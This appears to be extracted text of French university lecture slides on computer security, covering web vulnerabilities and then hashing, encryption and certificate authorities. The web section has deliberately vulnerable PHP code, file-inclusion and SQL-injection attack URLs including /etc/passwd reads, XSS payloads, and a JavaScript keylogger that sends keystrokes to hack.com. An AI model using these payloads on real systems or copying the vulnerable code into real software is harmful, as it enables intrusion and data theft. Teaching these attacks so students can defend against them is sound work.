Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 171 / 1
MUV : principe fondamental
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 172 / 1
MUV : Généralisation : Injection de code
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 173 / 1
MUV : Quelques exemples
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 174 / 1
MUV : Sur les noms de fichiers
Exemple d’inclusion.
Soit le programme PHP suivant
<?
include ("header.inc");
$page=$_GET[’page’]; # On récupère la variable "page"
include ($page);
include ("footer.inc");
?>
que l’on utilise de la manière suivante
Utilisation
http://192.168.30.72/mep.php?page=toto.txt
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 175 / 1
MUV : Sur les noms de fichiers
Quelques attaques :
Exemples simples d’utilisation malveillante
http://192.168.30.72/mep.php?page=/etc/passwd
http://192.168.30.72/mep.php?
page=https://dsi.ut-capitole.fr/creufophacker.inc
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 176 / 1
MUV :Solution
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 177 / 1
MUV : Les injections SQL (ou LDAP)
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 178 / 1
MUV : Les injections SQL ou LDAP
Utilisation
http://192.168.30.72/test_sql.php?id=3
Code du programme
$id=$_GET[’id’];
$sql_query="DELETE FROM matable WHERE id=$id";
mysql_connect($database);
mysql_query($database,$sql_query);
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 179 / 1
MUV : Les injections SQL première attaque
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 180 / 1
MUV : Les injections SQL 1bis
Code du programme
<?
$id=$_GET[’id’];
$sql_query="DELETE FROM matable WHERE id=$id AND user=’USER1’";
mysql_connect($database);
mysql_query($database,$sql_query);
?>
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 181 / 1
MUV : Les injections SQL attaque 1bis
On ajoute un commentaire
http://192.168.30.72/test_sql.php?id=3 OR 1=1 --
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 182 / 1
MUV : Les injections SQL attaque 1ter
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 183 / 1
MUV : Les injections SQL attaque 1ter
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 184 / 1
MUV : Les injections SQL première solution
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 185 / 1
MUV : Les injections SQL deuxième attaque
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 186 / 1
MUV : Les injections SQL deuxième solution
Code du programme
$id=add_slashes($id);
$sql_query="DELETE FROM matable WHERE id=’$id’";
Qui ne fait plus rien. Mais ce n’est toujours pas fini. Une faille
existe malgré cela.
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 187 / 1
MUV : Les injections SQL troisième attaque
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 188 / 1
MUV : Les injections SQL troisième attaque
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 189 / 1
MUV : Les injections SQL troisième attaque
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 190 / 1
Et si c’était possible ?
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 191 / 1
Et bien si en fait !
Je fais le malin.
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 192 / 1
MUV : Les variables de session
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 193 / 1
MUV : Voler un cookie : Attaque
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 194 / 1
MUV : Voler un cookie : Problème
Et si on saisit ?
<script>
while (1)
alert("Vas téter la prise électrique");
</script>
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 195 / 1
MUV : Voler un cookie : Problème
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 196 / 1
MUV : Voler un cookie : Solution
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 197 / 1
MUV : Voler un cookie : Vraiment la solution ?
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 198 / 1
MUV : Pire encore ?
Spécifique IE
<bgsound onpropertychange="code Javascript">
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 199 / 1
MUV : XSS = solution globale
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 200 / 1
MUV : XSS = vol de cookie ?
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 201 / 1
En outil de DOS HTTP : JS-LOIC
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 202 / 1
Et moi ?
<script language="javascript">
var keys=’’;
document.onkeypress = function(e) {
get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;
}
window.setInterval(function(){
new Image().src = ’http://hack.com/keylogger.php?c=’+keys;
keys = ’’;
}, 1000);
</script>
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 203 / 1
Et si on intégrait tout ça ?
http://www.beefproject.com
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 204 / 1
Un constat difficile
Un constat
beaucoup d’applications sont livrées "telles quelles"
il y a souvent un historique lourd
les applications sont "mouvantes".
les développeurs ne sont pas souvent formés.
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 205 / 1
Des solutions globales
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 206 / 1
Le chiffrement
Le Chiffrement
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 207 / 1
Le chiffrement
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 208 / 1
Hashage: définition
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 209 / 1
Hashage: Exemple "physique"
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 210 / 1
Hashage: utilité
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 211 / 1
Exemples de Hashage
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 212 / 1
Hashage: utilisation pour les mots de passe
Génération :
Alice choisit son mot de passe M1
Le système "hashe" M1 pour obtenir HASH1
Le système ne conserve que HASH1
Utilisation
Alice se reconnecte, en tapant le mot de passe M2
(normalement identique à M1)
Le système hashe M2 et obtient HASH2
Si HASH2=HASH1 alors M2=M1, donc OK
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 213 / 1
Hashage: casser les mots de passe ?
On sait que
Les "hash" ne sont pas réversibles.
Pourtant on peut les "casser" (s’ils sont "devinables").
Question: comment ?
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 214 / 1
Hashage: casser les mots de passe
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 215 / 1
Hashage: problème
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 216 / 1
Hashage: Le sel
La séquence.
Alice donne pour la première fois son mot de passe M1
Le système qui reçoit le mot de passe:
génère, à l’insu de Alice, une chaine S1 (le sel) par exemple
Ag12kA, différent pour chaque utilisateur,
calcule HASH1=hash( M1 + S1),
stocke dans sa base de donnée "Alice", HASH1 et S1 (car il
est le seul à le connaitre).
Pour vérifier le système
récupère le S1 associé à Alice,
calcule HASH2=hash(M2 + S1),
compare HASH2 et HASH1,
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 217 / 1
Hashage: cassage de mot de passe "salés"
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 218 / 1
Hashage: les aides matérielles
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 219 / 1
Hashage: conséquences
Quand le pirate vole les mots de passe, les "sels" sont avec
On ne peut pas utiliser les rainbow tables
Mais on peut recalculer les hash avec le sel
Si on a un dictionnaire avec les 630 millions de mot de passe
les plus courants (disponible sur le net).
Il ne faut que..... 0,07 seconde pour calculer le hash MD5 avec
la méthode précédente.
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 220 / 1
Hashage: les pistes suivantes
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 221 / 1
Hash de mot de passe : bcrypt et argon2
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 222 / 1
Vocabulaire
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 223 / 1
Pièges du chiffrement
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 224 / 1
Chiffrement symétrique
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 225 / 1
Chiffrement symétrique
Alice
Algorithme Bob
Message de
chiffrement Message chiffré
Algorithme
de Message
déchiffrement
Clé
de
Chiffrement
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 226 / 1
Chiffrement symétrique : exemples
Exemples à transposition
Code de Vigenère
XOR
Exemples à permutation
DES (64 bits), et triple DES (3DES)
IDEA
AES (actuel standard de l’armée US)
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 227 / 1
Chiffrement symétrique : caractéristiques
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 228 / 1
Chiffrement symétrique : DES
Ancien standard
56 bits (64 - 8 réservés à la parité)
Version renforcée : le triple DES, mais à 2 clés. Efficacité de
113 bits
Bloc de permutation de 64 bits
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 229 / 1
Chiffrement symétrique : AES
http://www.securiteinfo.com/crypto/aes.shtml
Nouveau standard (il s’appellait Rijndael à l’origine après un
concours de la NSA)
Auteurs Rijmen et Daemen
Plusieurs versions de 128, 192 ou 256 bits
Plus rapide que DES (il ne travaille qu’avec des entiers)
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 230 / 1
Chiffrement asymétrique
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 231 / 1
Chiffrement asymétrique
Alice
Clé publique
de Bob
Publication
sur Internet Algorithme
de
Message chiffrement
Bob
Clé publique
de Bob
Génération
du bi-clé
Algorithme
Clé privée
de Message
de Bob
déchiffrement
Message chiffré
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 232 / 1
Chiffrement asymétrique : avantages
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 233 / 1
Chiffrement asymétrique : inconvénients
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 234 / 1
Chiffrement asymétrique : exemples
Méthodes
R.S.A.
Diffie Helmann
El Gamal (logarithme discret)
Courbes elliptiques
Outils
PGP
GPG
Openssl
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 235 / 1
Chiffrement asymétrique : PGP
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 236 / 1
Chiffrement asymétrique : GPG
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 237 / 1
Chiffrement asymétrique : RSA
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 238 / 1
Chiffrement : réalité
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 239 / 1
Cassage de clé : en 1995
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 240 / 1
Cassage de clé : évolution
La vision en 2001 :
1982 1992 2002 2012 2022 2032
symétrique 56 64 72 80 87 95
RSA/log discret 417 682 1028 1464 1995 2629
DSS 102 114 127 141 154 168
Courbes elliptiques 135 149 164 179
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 241 / 1
Chiffrement asymétrique : Signature
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 242 / 1
Chiffrement asymétrique : Signature
Alice
Bob Message
Algo Hash Clé publique
Message Message Hash codé
Algo Chiffrement de Bob
Hash Codé
Clé privée
Hash Hash Hash déchiffré
de Bob
Algorithme
de Comparaison
chiffrement
Hash chiffré
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 243 / 1
Autorité de certification
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 244 / 1
Autorité de certification : création
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 245 / 1
Autorité de certification : création
Clé Publique
de Verisign
Verisign
Certificateur : Verisign
Clé publique Objet : Verisign
de Verisign
Chiffrement : RSA
Hashage : MD5
Hash Codé
hashage MD5
Clé privée
Hash
de Verisign
chiffrement RSA
Hash chiffré
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 246 / 1
Autorité de certification : certification
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 247 / 1
Autorité de certification : certification
BNP
Verisign
Vérification
identité
Clé publique
de BNP
Clé Publique
de BNP
Certificateur : Verisign
hashage MD5 Objet : BNP
Chiffrement : RSA
Hashage : MD5
Hash Codé
Clé privée
Hash
de Verisign
chiffrement RSA
Hash chiffré
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 248 / 1
Autorité de certification : utilisation
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 249 / 1
Autorité de certification : chaîne
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 250 / 1
Autorité de certification
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 251 / 1
Preuve
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 252 / 1
Certificats : Une norme X509
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 253 / 1
Certificats : Une norme X509
Certificate:
Data:
Version: 1 (0x0)
Serial Number: 7829 (0x1e95)
Signature Algorithm: md5WithRSAEncryption
Issuer: C=ZA, ST=Western Cape, L=Cape Town, O=Thawte Consulting cc,
OU=Certification Services Division,
CN=Thawte Server CA/emailAddress=server-certs@thawte.com
Validity
Not Before: Jul 9 16:04:02 1998 GMT
Not After : Jul 9 16:04:02 1999 GMT
Subject: C=US, ST=Maryland, L=Pasadena, O=Brent Baccala,
OU=FreeSoft, CN=www.freesoft.org/emailAddress=baccala@freesoft.org
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:b4:31:98:0a:c4:bc:62:c1:88:aa:dc:b0:c8:bb:
...
d2:75:6b:c1:ea:9e:5c:5c:ea:7d:c1:a1:10:bc:b8:
e8:35:1c:9e:27:52:7e:41:8f
Exponent: 65537 (0x10001)
Signature Algorithm: md5WithRSAEncryption
93:5f:8f:5f:c5:af:bf:0a:ab:a5:6d:fb:24:5f:b6:59:5d:9d:
....
0d:19:aa:ad:dd:9a:df:ab:97:50:65:f5:5e:85:a6:ef:19:d1:
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 254 / 1
Les AC pré-chargées
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 255 / 1
Le chiffrement homomorphe et le chiffrement fonctionnel
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 256 / 1
URLographie
http://michel.arboi.free.fr/cryptFAQ
http://www.ossir.org/resist/supports/cr/200203/
crypto.pdf
http://cr.yp.to/
Fabrice Prigent La sécurité informatique MIAGE/ Coboliste Jeudi 1er décembre 2022 257 / 1